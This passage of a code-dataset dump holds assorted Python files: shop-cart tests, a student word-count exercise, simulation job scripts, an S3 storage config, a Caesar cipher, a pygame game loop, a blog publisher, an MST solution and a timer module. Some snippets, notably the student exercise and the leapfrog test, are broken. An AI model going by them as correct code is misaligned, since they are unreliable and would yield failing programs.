decimal.Decimal(\"100.0\"))\n self.assertNotEquals(self.cart.taxes(), ny_tax * decimal.Decimal(item.price) / decimal.Decimal(\"100.0\"))\n\n #if shipping address is not MI or NY, no tax must be applied...\n shippingdata = ShippingData(street_address=\"Abey Road\", city=\"Great Beach\", state=\"IO\", zip=\"11001\", country=\"US\")\n shippingdata.save()\n self.cart.shippingdata = shippingdata\n\n self.assertEquals(self.cart.taxes(), decimal.Decimal(\"0.0\") ) \n \n \n def testShippingCharge(self):\n item = Item(shop=self.shop, \n title=\"item\",\n description=\"an item\", \n price=\"10.0\", \n category=self.category, \n subcategory=self.subcategory, \n qty=5, \n weight=\"2.0\")\n item.save()\n #add an item to the cart\n self.cart.add(item, item.price, qty=3)\n \n #set the shipping address \n shippingdata = ShippingData(street_address=\"Abey Road\", city=\"Great Beach\", state=\"MI\", zip=\"11001\", country=\"US\")\n shippingdata.save()\n self.cart.shippingdata = shippingdata\n \n sw1 = ShippingWeight(shop=self.shop, name=\"Shipping by Weight\", price=\"3.00\", from_weight=\"0.0\", to_weight=\"5.0\")\n sw1.save()\n sw2 = ShippingWeight(shop=self.shop, name=\"Shipping by Weight\", price=\"5.00\", from_weight=\"5.0\", to_weight=\"10.0\")\n sw2.save()\n self.assertEquals(self.cart.shipping_charge(), decimal.Decimal(\"5.0\"))\n sw1.delete()\n sw2.delete()\n \n si1 = ShippingItem(shop=self.shop, name=\"Shipping by Item\", price=\"9.00\", from_item=0, to_item=3)\n si1.save()\n si2 = ShippingItem(shop=self.shop, name=\"Shipping by Item\", price=\"19.00\", from_item=3, to_item=5)\n si2.save()\n si3 = ShippingItem(shop=self.shop, name=\"Shipping by Item\", price=\"29.00\", from_item=5, to_item=15)\n si3.save()\n \n self.assertEquals(self.cart.shipping_charge(), decimal.Decimal(\"9.0\"))\n si1.delete()\n si2.delete()\n si3.delete()\n \n pw1 = ShippingPrice(shop=self.shop, name=\"Shipping by Price\", price=\"5.00\", from_price=\"0.0\", to_price=\"20.0\")\n pw1.save()\n pw2 = ShippingPrice(shop=self.shop, name=\"Shipping by Price\", price=\"9.00\", from_price=\"20.0\", to_price=\"40.0\")\n pw2.save()\n self.assertEquals(self.cart.shipping_charge(), decimal.Decimal(\"9.0\"))\n pw1.delete()\n pw2.delete()\n \n \n def testCartClose(self):\n item = Item(shop=self.shop, \n title=\"item\",\n description=\"an item\", \n price=\"10.0\", \n category=self.category, \n subcategory=self.subcategory, \n qty=2, \n weight=\"2.0\")\n item.save()\n \n item2 = Item(shop=self.shop, \n title=\"item\",\n description=\"an item\", \n price=\"10.0\", \n category=self.category, \n subcategory=self.subcategory, \n qty=2, \n weight=\"2.0\")\n item2.save()\n \n shippingdata = ShippingData(street_address=\"Calle 8 n 182\", city=\"La Plata\", state=\"Buenos Aires\", zip=\"1900\", country=\"AR\")\n shippingdata.save()\n \n #add the shipping data\n self.cart.shippingdata = shippingdata\n self.cart.save()\n \n #add 2 items\n self.cart.add(item, item.price, qty=1)\n self.cart.add(item2, item.price, qty=2)\n \n #close the cart\n sell = self.cart.close(\"manual\")\n \n #check that the sell object has the default values setted... 
\n self.assertEquals(self.cart.total_items(), 0)\n self.assertEquals(sell.closed, False)\n self.assertEquals(sell.sellitem_set.count(), 2)\n self.assertEquals(sell.payment.state_actual.state, \"PE\")\n self.assertEquals(sell.shipping.state_actual.state, \"PE\")\n \n ","sub_path":"stores/apps/sell/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":8312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"642922791","text":"import functools\nimport typing\nimport string\nimport random\nimport pytest\n\n## Lösung Teil 1.\ndef nwords(s: str)-> int:\n \"\"\"\n Die Funktion nwords berechenet zu einem String Argument s die Anzahl der Worte im String.\n \n args:\n s(str): Text \n return:\n Anzahl an Wörter im Text\n \n \"\"\"\n if len(s) == 0:\n return 0\n result = 1\n for element in s:\n if element == (\" \"):\n result += 1\n return result\n## Lösung Teil 2.\ndef word_count_iter(m):\n \"\"\"\n Die Funktion word_count_iter\n args:\n m: iterierbares Objekt\n return:\n Tupel aus der Anzahl der Zeilen, der Anzahl der Worte und der Anzahl der Zeichen liefert, die aus dem Argument gelesen worden sind\n \"\"\"\n zeilen = 0\n worte = nwords(m)\n zeicher = len(m)\n for element in m:\n yield element\n zeilen += 1\n \n return (zeilen, worte, zeichen)\n \n######################################################################\n## Lösung Teil 3. (Tests)\nassert word_count_iter(\"Hallo das ist ein test\") == (1,5,23)\n## revert\ntry:\n word_count_iter = word_count_iter.__wrapped__\nexcept:\n pass\n\n## Lösung Teil 4.\n\n######################################################################\n","sub_path":"StudentProblem/10.21.12.4/1/1569575864.py","file_name":"1569575864.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"465333283","text":"#!/usr/bin/python\n\n# $ python3 parser_worklaod_stats.out \n#\n# Parses the statistic printed by the CODES synthetic workloads.\n# Reads all *.out files in the provided location\n# Updated 20200302\n\nimport os\nimport re\nimport sys\nimport stat\nimport csv\nimport glob\nfrom random import randint\nfrom pprint import pprint\n\n\n#if len(sys.argv) != 2:\n#\tprint(\"ERROR | Too many command line arguments.\")\n#\texit(1)\n\n\n# Read input: sys_size\n#sys_size = int(sys.argv[1])\n#num_allocs = int(sys.argv[2])\nbasedir = '/home/kabrown/case-studies/qos-swm/experiments'\nlevel = 'coarse'\nallocname = 'alloc1'\noutdir = basedir + '/' + allocname\nlpiopath = outdir + '/riodir'\n\nmpirun = \"mpirun --report-bindings --np 1 --mca btl '^openib' --rankfile \"\nmpireplay = '/home/kabrown/opt/codes-1.2qx-debug2-withswmfork-intel-isc/bin/model-net-mpi-replay '\n\n#codesargs = ' --synch=1 --workload_type=online --extramem=80000000 --priority_type=1 --payload_sz=65536 --mean_interval=2000 '\n#codesargs = ' --synch=1 --workload_type=online --extramem=50000000 --payload_sz=8192 --max_gen_data=17039360 --mean_interval=305 '\n#codesargs = ' --synch=1 --workload_type=online --extramem=50000000 --payload_sz=65536 --max_gen_data=13107200 --mean_interval=2000 '\n#codesargs = ' --synch=1 --workload_type=online --extramem=10000000 --payload_sz=640 --max_gen_data=6400000 --mean_interval=20 '\n\nif level == 'medium' or level == 'fine':\n codesargs = ' --synch=1 --workload_type=online --extramem=50000000 --payload_sz=640 --priority_type=1 ' # for medium-grain QoS\nelse:\n codesargs = ' --synch=1 --workload_type=online 
--extramem=50000000 --payload_sz=640 ' # for coarse-grain QoS. priority_type is 0 by default\n\ncodesargs = codesargs + '--lp-io-dir=' + lpiopath + ' --lp-io-use-suffix=1'\n\n\nrankfilepath = basedir + '/rankfiles'\nallocpath = basedir + '/workloads' + '/' + allocname\nnetpath = basedir + '/conf_files'\nnetprefix = 'dfd1088_tapered_'\n\n\n\nrankfiles = glob.glob(os.path.normpath(rankfilepath + \"/rankfile07*\"))\n\nrankfiles.sort()\n#del(rankfiles[:12])\n#pprint(rankfiles)\ni = 0 # For the initial rankfile index\n\n\n\nworkloads = [\n# {'name': 'rand1088', 'qosconf': ['noqos','qos4_1'], 'compute': [0]},\n# {'name': 'spread', 'qosconf': ['noqos'], 'compute': [0]},\n {'name': 'lammps', 'qosconf': ['noqos'], 'compute': [0]},\n# {'name': 'milc', 'qosconf': ['noqos'], 'compute': [0]},\n# {'name': 'many_to_many', 'qosconf': ['noqos'], 'compute': [0]}\n ]\n\n\nfor wk in workloads:\n name = wk['name']\n \n jobcommand = ''\n\n for qos in wk['qosconf']:\n netfile = netpath + '/' + netprefix + qos + '.conf'\n\n for comp in wk['compute']:\n jobtag = name \\\n + '.' + allocname \\\n + '.dc' + str(comp) \\\n + '.' + qos \\\n + '.' + level\n\n outfile = outdir + '/' + 'out.' + jobtag\n jobfile = os.path.normpath(outdir + '/' + str(i).zfill(3) + '.' + jobtag + '.sh')\n\n periodfile = allocpath + '/' + name + '.period'\n loadfile = allocpath + '/' + name + '.load'\n appalloc = allocpath + '/' + name + '.alloc'\n\n jobcommand = mpirun + rankfiles[i] \\\n + ' ' + mpireplay \\\n + ' ' + codesargs \\\n + ' --workload_conf_file=' + loadfile \\\n + ' --alloc_file=' + appalloc \\\n + ' --disable_compute=' + str(comp) \\\n + ' -- ' + netfile \\\n + ' &>> ' + str(outfile)\n\n # Copy settings\n\n\n #pprint(rankfiles[i])\n #print(outfile)\n #print(str(i) + \"------\" + command)\n with open(jobfile, 'w') as f:\n f.write(jobcommand) \n\n st = os.stat(jobfile)\n os.chmod(jobfile, st.st_mode | stat.S_IEXEC)\n\n print(jobfile)\n\n i = i + 1\n if i == len(rankfiles):\n i = 0\n\n\n \nprint(\"Completed.\")\n\n''' \n\nmpirun --report-bindings --np 1 --rankfile /home/kabrown/fs0-ipdps2021/experiments/rankfiles/rankfile0.11 --mca btl '^openib' \\\n\t/home/kabrown/opt/codes-1.2qx-debug2-withswm-intel/bin/model-net-mpi-replay --synch=1 \\\n\t--workload_type=online --extramem=10000000 --disable_compute=1 --debug_cols=1 --priority_type=1 \\\n\t--workload_conf_file=/home/kabrown/fs0-ipdps2021/experiments/workloads/lammps.load \\\n\t--alloc_file=/home/kabrown/fs0-ipdps2021/experiments/workloads/job.lammps.alloc \\\n\t--lp-io-dir=/home/kabrown/fs0-ipdps2021/experiments/lpio/lpio_output --lp-io-use-suffix=1 \\\n\t-- /home/kabrown/fs0-ipdps2021/experiments/conf_files/dfd8k_noqos.conf \\\n\t&>> out.lammps.nocompute\n\n'''\n'''\nprint(\"System size: \", sys_size)\n\nalloc_written = 0\nall_allocs = []\nmarked_nodes = []\nfilename = \"rand\" + str(sys_size)\n#filename += \"_\".join(map(str, alloc_size))\nallocfile = open(filename + '.alloc', 'w')\nloadfile = open(filename + '.load', 'w')\n\ndef new_alloc(size, name, qos):\n global marked_nodes\n\n alloc = []\n for j in range(size):\n k = randint(0, sys_size-1)\n\n while( k in marked_nodes):\n k = randint(0, sys_size-1)\n \n alloc.append(k)\n marked_nodes.append(k)\n\n alloc.sort()\n\n # Write to global file\n global alloc_written\n if(alloc_written != 0):\n allocfile.write(\"\\n\")\n loadfile.write(\"\\n\")\n\n allocfile.write(' '.join(map(str, alloc)))\n loadfile.write(str(size) + ' ' + name + ' ' + str(qos))\n\n alloc_written = alloc_written + 1\n\n #print(\"Allocated: \", size)\n\n # 
return \n return alloc\n\ndef write_my_file(size, name, qos, alloc, rep):\n flag = ''\n jump = ''\n if rep == 0:\n flag = 'w'\n else:\n flag = 'a'\n jump = '\\n'\n\n with open(name + \".alloc\", flag) as f:\n f.write(jump + ' '.join(map(str, alloc)))\n with open(name+ \".load\", flag) as f:\n f.write(jump + str(size) + ' ' + name + ' ' + str(qos))\n\n\nworkloads = [\n {'name': 'lammps', \n 'size': 2048,\n 'reps': 1,\n 'qos': 1},\n {'name': 'nekbone', \n 'size': 2197,\n 'reps': 1,\n 'qos': 1},\n {'name': 'incast', # scavenger\n 'size': 512,\n 'reps': 1,\n 'qos': 3},\n {'name': 'lammps', \n 'size': 2048,\n 'reps': 1,\n 'qos': 1},\n {'name': 'incast1', # I/O\n 'size': 2,\n 'reps': 128,\n 'qos': 2}\n ]\n\n\nfor wk in workloads:\n for i in range(wk['reps']):\n alloc = new_alloc(wk['size'], wk['name'], wk['qos'])\n write_my_file(wk['size'], wk['name'], wk['qos'], alloc, i)\n\n\n\n#lammps 1\nqos = 1\nsize = 5\nname = \"lammps\"\nalloc = new_alloc(size, name, qos)\nwrite_my_file(name, size, alloc, qos)\n\n\n#lammps 2\nqos = 1\nsize = 5\nname = \"lammps\"\nalloc = new_alloc(size, name, qos)\nwrite_my_file(name, size, alloc, qos)\n\n\n#neckbone\nqos = 1\nsize = 5\nname = \"nekbone\"\nalloc = new_alloc(size, name)\nwrite_my_file(name, size, alloc)\n\n#incast (scavenger)\nqos = 3\nsize = 3\nname = \"incast\"\nalloc = new_alloc(size, name)\nwrite_my_file(name, size, alloc)\n\n#incast2 (bulk data)\nrep = 2\nqos = 2\nname = \"incast2\"\nwith open(name + \".alloc\", 'w') as f:\n with open(name + \".load\", 'w') as g:\n count = 0\n for i in range(3):\n size = 2\n alloc = new_alloc(size, name)\n\n if(count != 0):\n f.write(\"\\n\")\n g.write(\"\\n\")\n\n f.write(' '.join(map(str, alloc)))\n g.write(str(size) + ' ' + name)\n\n count = count +1\n\n\nallocfile.close()\n'''\n\n","sub_path":"scripts/qos/gen_job.py","file_name":"gen_job.py","file_ext":"py","file_size_in_byte":7612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"269132521","text":"# -*- conding: utf-8 -*-\n# This file contains configuration for storages\n# http://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html\n\nimport os\n\n# Backends ******************************************************\nDEFAULT_FILE_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'\nSTATICFILES_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'\n\n# AWS Account ***************************************************\nAWS_ACCESS_KEY_ID = os.getenv('AWS_KEY')\nAWS_SECRET_ACCESS_KEY = os.getenv('AWS_SECRET')\n\n\n# Basic Config ***************************************************************************\n# If set to True the bucket specified in AWS_STORAGE_BUCKET_NAME is automatically created.\nAWS_AUTO_CREATE_BUCKET = True\n\n# Setting AWS_QUERYSTRING_AUTH to False to remove query parameter authentication from generated URLs.\n# This can be useful if your S3 buckets are public.\nAWS_QUERYSTRING_AUTH = False\n\n# By default files with the same name will overwrite each other. 
Set this to False to have extra characters appended.\nAWS_S3_FILE_OVERWRITE = True\n\nAWS_S3_OBJECT_PARAMETERS = {\n 'CacheControl': 'max-age=86400',\n}\n\nAWS_S3_SIGNATURE_VERSION = 's3v4'\n\n# A path prefix that will be prepended to all uploads, default ''\nAWS_LOCATION = ''\n\n\n# Bucket config *************************************************************************\nAWS_S3_HOST = 's3.ap-northeast-2.amazonaws.com'\nAWS_STORAGE_BUCKET_NAME = 'dibiup-static-v2'\nAWS_S3_CUSTOM_DOMAIN = '{0}.s3.ap-northeast-2.amazonaws.com'.format(AWS_STORAGE_BUCKET_NAME)\nSTATIC_URL = \"http://%s/static/\" % AWS_S3_CUSTOM_DOMAIN\nMEDIA_URL = \"http://%s/user_static/\" % AWS_S3_CUSTOM_DOMAIN\nMEDIA_ROOT = os.path.join(AWS_S3_CUSTOM_DOMAIN, 'user_static')\n\n","sub_path":"dibiup_server_v2/dibiup_server/plugins/storages/storages_config.py","file_name":"storages_config.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"8607929","text":"text = input(\"Enter plain text:\")\nkey = input(\"Enter key:\")\nencry = []\nfor ch in range(len(text)):\n e = ord(text[ch])\n if(e>64 and e<91):\n e = ord(text[ch])+int(key)\n if(e>90):\n set = e-90\n e = set + 64\n encry.append(chr(e))\n if(e>96 and e<123):\n e = ord(text[ch])+int(key)\n if(e>122):\n set = e-122\n e = set + 96\n encry.append(chr(e))\n#for enc in encry:\n \nprint(\"Encrypted Message:\")\nprint(encry)\n\ndecry = []\nfor ch in range(len(encry)):\n d = ord(encry[ch])\n if(d>64 and d<91):\n d = ord(encry[ch])-int(key)\n if(d<65):\n set = 65 - d\n d = 91-set\n decry.append(chr(d))\n if(d>96 and d<123):\n d = ord(encry[ch])-int(key)\n if(d<97):\n set = 97 - d\n d = 123-set\n decry.append(chr(d))\nprint(\"Decrypted Message:\")\nprint(decry) ","sub_path":"Practical-1/caesar_cipher.py","file_name":"caesar_cipher.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"459252943","text":"import os\nimport sys\nimport time\nimport pygame\nimport traceback\nimport subprocess\n\nfrom Character import *\nfrom BG import *\n\nturn = 0\nindex = 0\nnowTurn = 0\n\nplayers = []\n\nos.system(\"sudo ./AudioRepeat.sh BGM/Egypt_Theme.mp3 &\")\npygame.init()\n\ncrashed = False\n\ndef GetDice(turn):\n subprocess.run(['python3', \"RF.py\", str(turn)])\n\n f = open(\"result\", 'r')\n result = f.readlines()\n print(result)\n while int(result[0]) != turn:\n time.sleep(0.001)\n\n return result\n\ndef GetTraceBackStr():\n lines = traceback.format_exc().strip().split(\"\\n\")\n rl = [lines[-1]]\n lines = lines[1:-1]\n lines.reverse()\n\n for i in range(0, len(lines), 2):\n rl.append(\"^\\t%s at %s\" % (lines[i].strip(), lines[i+1].strip()))\n\n return '\\n'.join(rl)\n\ntry:\n InitBackground()\n while not crashed:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n crashed = True\n\n if event.type is pygame.KEYDOWN:\n\n if event.key == pygame.K_f:\n ChangeFULL()\n\n if event.key == pygame.K_c:\n ChangeCONN(False)\n\n if event.key == pygame.K_q:\n crashed = True\n\n if event.key == pygame.K_d:\n flag_DOOR = ((flag_DOOR % 4) + 1) * -1\n SetDoor(flag_DOOR)\n\n if event.key == pygame.K_1:\n if not flag_RED:\n flag_RED = True\n players.append(Player(index, \"Red\"))\n index = index + 1\n\n if event.key == pygame.K_2:\n if not flag_BLUE:\n flag_BLUE = True\n players.append(Player(index, \"Blue\"))\n index = index + 1\n\n if event.key == pygame.K_3:\n if not flag_GREEN:\n flag_GREEN = True\n 
players.append(Player(index, \"Green\"))\n index = index + 1\n\n if event.key == pygame.K_4:\n if not flag_PURPLE:\n flag_PURPLE = True\n players.append(Player(index, \"Purple\"))\n index = index + 1\n\n if event.key == pygame.K_t:\n if index != 0:\n nowTurn = nowTurn + 1\n nowTurn = nowTurn % (index)\n\n elif event.type is pygame.KEYUP:\n if event.key == pygame.K_c:\n ChangeCONN(True)\n\n Frame(players)\n pygame.display.update()\n\n for player in players:\n player.CheckTurn(nowTurn)\n\nexcept Exception as e:\n print(GetTraceBackStr())\n\nfinally:\n os.system(\"sudo killall AudioRepeat.sh\")\n os.system(\"sudo killall mpg123\")\n os.system(\"sudo killall python3\")\n pygame.quit()\n","sub_path":"Board/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"341319583","text":"from sys import stdin, stdout\nfrom Shop.shopFacade import get_product, get_json_product\nfrom Utils.shopDataTypes import ProductProperties, TitleProperties, PriceProperties, ShopWebsiteInfo\nfrom os import rename, getcwd\nfrom os.path import join\nimport sqlite3\nfrom datetime import date\nfrom Utils.shopUtils import store_product, store_shop_website, get_main_url\nfrom Utils.databaseConsts import SHOP_WEBSITES, SHOP_TITLE_IDS, SHOP_IMG_IDS\n\nshopInfos = {}\n\nlast_product = None\nlast_shopInfo = None\nconnection = None\nunknown_website = False\n\ndef get_shop_info(main_url):\n shopInfo = shopInfos.get(main_url, None)\n\n if(not shopInfo):\n cursor = connection.cursor()\n infos = cursor.execute(f\"SELECT * FROM {SHOP_WEBSITES} WHERE url = '{main_url}'\").fetchone()\n if(infos):\n titleIds = cursor.execute(f\"SELECT tag_id FROM {SHOP_TITLE_IDS} WHERE website_id={infos[0]}\").fetchall()\n titleIds = set(map(lambda x: x[0], titleIds)) if titleIds else None\n imgIds = cursor.execute(f\"SELECT tag_id FROM {SHOP_IMG_IDS} WHERE website_id={infos[0]}\").fetchall()\n imgIds = set(map(lambda x: x[0], imgIds)) if imgIds else None\n \n shopInfo = ShopWebsiteInfo.from_db(*infos, titleIds, imgIds)\n\n return shopInfo\n\ndef simple():\n url = stdin.readline().rstrip(\"\\n\")\n\n main_url = get_main_url(url)\n\n last_product, last_shopInfo = get_product(url, main_url)\n\n print(get_json_product(last_product, last_shopInfo.url_id, last_shopInfo.name))\n stdout.flush()\n\ndef handle_item():\n url = stdin.readline().rstrip(\"\\n\")\n global last_product, last_shopInfo, unknown_website\n\n main_url = get_main_url(url)\n shopInfo = get_shop_info(main_url)\n unknown_website = False if shopInfo else True\n if(shopInfo):\n shopInfos[main_url] = shopInfo\n\n last_product, last_shopInfo = get_product(url, main_url, shopInfo)\n\n print(get_json_product(last_product, last_shopInfo.url_id, last_shopInfo.name))\n stdout.flush()\n\ndef handle_show_item():\n print(get_json_product(last_product, last_shopInfo.url_id, last_shopInfo.name))\n stdout.flush()\n\ndef handle_save_item():\n website_id = None\n if(last_product and last_shopInfo):\n cursor = connection.cursor()\n\n if(unknown_website): \n store_shop_website(cursor, last_shopInfo, getcwd())\n shopInfos[last_shopInfo.url] = last_shopInfo\n \n website_id = last_shopInfo.website_id\n store_product(cursor, last_product, last_shopInfo)\n \n connection.commit()\n\n print(website_id)\n stdout.flush()\n\ntable = {\n \"get_item\": handle_item,\n \"show_last_item\": handle_show_item,\n \"save_item\": handle_save_item,\n \"simple\": simple\n}\n\ndef get_in():\n message = 
stdin.readline()\n return message.rstrip(\"\\n\")\n\ndef main():\n with sqlite3.connect(\"shopTeste.sqlite\") as conn:\n global connection\n connection = conn\n while(True):\n opt = get_in()\n if(opt != \"exit\"):\n if(opt in table): table[opt]()\n else: \n print(\"exit\")\n break\n \n\nif __name__ == \"__main__\":\n main()","sub_path":"engine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"439926066","text":"from pydocx import PyDocX\nimport sys, os, time, shutil, docx\n\ndef git_push():\n os.system('git add .')\n os.system(\"git commit -m'backup'\")\n os.system('git push')\n\ndef rename(str):\n new_str = ''\n index = 0\n for i in str:\n if str[index] == '.' and str[index + 1] == 'd' and str[index + 2] == 'o' and str[index + 3] == 'c' and str[index + 4] == 'x':\n break\n new_str = new_str + i\n index += 1\n return new_str\n\ndef main():\n file = \"../../../../Desktop/blog\"\n before = dict ([(f, None) for f in os.listdir (file)])\n while True:\n time.sleep(1)\n after = dict([(f, None) for f in os.listdir(file)])\n added = [f for f in after if not f in before]\n removed = [f for f in before if not f in after]\n\n if added:\n print(\"Added:\", \", \".join(added))\n\n #get(Date)\n date = time.strftime(\"%m-%d-%Y %H:%M\", time.localtime())\n print(date)\n\n #get(Header Lead Label)\n doc = docx.Document(file + \"/\" + \" \".join(added))\n fullText = []\n header = doc.paragraphs[0].text\n label = doc.paragraphs[2].text\n lead = doc.paragraphs[4].text\n print(header)\n print(label)\n print(lead)\n type(lead)\n\n name = rename(\" \".join(added))\n\n #make contents\n html = PyDocX.to_html(file + \"/\" + \" \".join(added))\n f = open(\"article/\" + name + \".html\", 'w', encoding=\"utf-8\")\n f.write(html)\n f.close()\n\n #make pages\n shutil.copy(\"blog-example.html\",\"article/bolg-\" + name + \".html\")\n temp = open(\"article/bolg-\" + name + \".html\", \"r+\")\n str = '
'\n temp.seek(0, 2)\n temp.write(str)\n temp.close()\n\n #get(URL)\n url = \"article/bolg-\" + name + \".html\"\n print(url)\n\n #write all elements(Date URL Header Label Lead)\n blogIndex = open(\"blog-index.txt\",'a+')\n DUHLL = date + \"⊠\" + url + \"⊠\" + header + \"⊠\" + label + \"⊠\" + lead + \"⊠\" + \"\\n\"\n blogIndex.write(DUHLL)\n blogIndex.close()\n\n after = dict([(f, None) for f in os.listdir(file)])\n\n print('test...................')\n\n\n indexHtml = 'Blog
© Hao -- 2019
'\n temp = open(\"blog-index.html\", \"w\")\n temp.write(indexHtml)\n temp.close()\n\n git_push()\n if removed:\n print(\"Removed:\", \", \".join(removed))\n\n before = after\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"blog/auto-push.py","file_name":"auto-push.py","file_ext":"py","file_size_in_byte":5875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"75433083","text":"#Uses python3\nimport sys\nimport math\nfrom collections import defaultdict\nfrom collections import defaultdict\n\n\nclass Node:\n '''\n A simple node class which stores rank and parent, for use in Disjoint Sets.\n By default, the parent is set to itself, unless a new parent is added.\n '''\n def __init__(self, rnk, d):\n self.rank = rnk\n self.parent = self\n self.data = d\n self.size = 1\n\n\nclass DisjointSet:\n '''\n A disjoint set datastructure, for implementing union find operations.\n '''\n\n def __init__(self):\n # The members dictionary hashes the value to the corresponding node\n self.members = dict()\n\n '''\n Input: Value to be retrieved from sets.\n Output: Node corresponding to the value if it is present, None otherwise.\n '''\n def get(self, val):\n if val in self.members:\n return self.members[val]\n else:\n return None\n\n def make_set(self, val):\n if val not in self.members:\n # The rank is initially 0 since it is a new set\n self.members[val] = Node(0, val)\n\n '''\n Takes input of a given node in the members dictionary.\n Returns the root of its set.\n '''\n def find(self, n):\n if n.parent != n:\n self.members[n.data].parent = self.find(n.parent)\n return n.parent\n\n def union(self, n1, n2):\n root_n1 = self.find(n1)\n root_n2 = self.find(n2)\n\n if root_n1 == root_n2:\n return True\n else:\n if root_n1.rank > root_n2.rank:\n self.members[root_n1.data].size += self.members[root_n2.data].size\n self.members[root_n2.data].parent = self.members[root_n1.data]\n elif root_n1.rank < root_n2.rank:\n self.members[root_n2.data].size += self.members[root_n1.data].size\n self.members[root_n1.data].parent = self.members[root_n2.data]\n else:\n self.members[root_n1.data].size += self.members[root_n2.data].size\n self.members[root_n2.data].parent = self.members[root_n1.data]\n self.members[root_n1.data].rank = root_n1.rank+1\ndef minimum_distance(x, y):\n result = 0.\n mapCoords = defaultdict()\n distList = [] \n \n #write your code here\n ds = DisjointSet()\n for i in range(len(x)) :\n mapCoords[i] = [x[i] , y[i]]\n #rprint(\"i= %s %s , %s\" %(i,x[i],y[i]))\n ds.make_set(i)\n \n for start in range(len(x)):\n for end in range(start + 1 ,len(x)):\n xstart,ystart = mapCoords[start][0],mapCoords[start][1]\n xend,yend = mapCoords[end][0],mapCoords[end][1]\n dist = math.sqrt(math.pow(xstart - xend,2) + (math.pow(ystart - yend,2)))\n distList.append([start,end,dist])\n distList.sort(key=lambda x:x[2])\n for edge in distList:\n node1 = ds.get(edge[0])\n node2 = ds.get(edge[1])\n node1Parent = ds.find(node1)\n node2Parent = ds.find(node2)\n #rprint(\"---------------------\\n\")\n #rprint(\"Before Node1Repr = %s Node2Repr = %s\" %(node1Parent.data,node2Parent.data))\n if node1Parent != node2Parent:\n result += edge[2]\n ds.union(node1,node2)\n #rprint(\"Edge = %s\" %(edge))\n\n #rprint(\"After Node1Repr = %s Node2Repr = %s\" %(node1Parent.data,node2Parent.data))\n\n return result\n\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n data = list(map(int, input.split()))\n n = data[0]\n x = data[1::2]\n y = data[2::2]\n 
print(\"{0:.9f}\".format(minimum_distance(x, y)))\n","sub_path":"Graphs/Coursera/Assignments/week5_mst/1_connecting_points/connecting_points_solution.py","file_name":"connecting_points_solution.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"22620760","text":"#By Kay Towner\r\n\r\nprint(\"This method I found online and adjusted it to the equation.\")\r\nimport math\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#solve: d2 - (dxdt)**2 + x + 5\r\ndef dif(t=None, h=None, x=None, dxdt=None, d2 = None):\r\n \"\"\"Differential equation to solve.\r\n d2=leapfrogmethod, dxdt=thederivative=0\"\"\"\r\n return -5 - x\r\n\r\nif __name__ == \"__main__\":\r\n #VERIABLES:\r\n h = 0.001 #step size\r\n t = np.arange(0, 50, h) #time\r\n x = 1 #initial condition (position)\r\n dxdt = 0\r\n \r\n v = np.empty(int(h+1)) #velocity initial\r\n x = np.empty(int(h+1))\r\n x[0] = x\r\n v[0] = 0\r\n new = dif(x=x)\r\n\r\n #Leapfrog:\r\n for i in range(0, int(h+1)):\r\n old = new\r\n x[i] = x[i-1] + v[i-1]*h + (1/2)*(old)*h**2\r\n new = dif(x=i)\r\n v[i] = v[i-1] + (1/2)*(old + new)*h\r\n\r\n\r\n\r\n print(\"test 1 v\", v)\r\n print(\"test 2 x[i]:\", x[i])\r\n #plt.plot(x, t)#x and y should be the same size\r\n plt.xlabel('t')\r\n plt.ylabel('t(x)')\r\n #plt.show\r\n","sub_path":"frogtest.py","file_name":"frogtest.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"315650262","text":"# -*- coding: utf-8 -*-\n# 15/6/8\n# create by: snower\n\nimport time\nimport signal\nimport logging\ntry:\n from Queue import Queue, Empty\nexcept ImportError:\n from queue import Queue, Empty\n\n__time_out_callback = None\n__exit_callback = None\n__queues = Queue()\n__is_stop = False\n__current_time = int(time.mktime(time.gmtime()))\n\ndef exit_handler(signum, frame):\n __queues.put((__exit_callback, tuple()), False)\n\ndef handler(signum, frame):\n __queues.put((__time_out_callback, (int(time.mktime(time.gmtime())),)), False)\n\ndef reset():\n global __time_out_callback, __exit_callback, __queues, __is_stop, __current_time\n __time_out_callback = None\n __exit_callback = None\n __queues = Queue()\n __is_stop = False\n __current_time = int(time.mktime(time.gmtime()))\n\ndef start(callback, exit_callback):\n global __time_out_callback, __exit_callback\n __time_out_callback = callback\n __exit_callback = exit_callback\n\ndef stop():\n global __time_out_callback, __exit_callback, __is_stop\n __time_out_callback = None\n __exit_callback = None\n __is_stop = True\n logging.info(\"timer stoping\")\n\ndef loop():\n signal.signal(signal.SIGHUP, exit_handler)\n signal.signal(signal.SIGINT, exit_handler)\n signal.signal(signal.SIGTERM, exit_handler)\n signal.signal(signal.SIGALRM, handler)\n signal.setitimer(signal.ITIMER_REAL, 1, 1)\n logging.info(\"timer ready\")\n while not __is_stop:\n try:\n callback, args = __queues.get(True, 1)\n if callback:\n callback(*args)\n except Empty:\n continue\n\ndef current():\n return 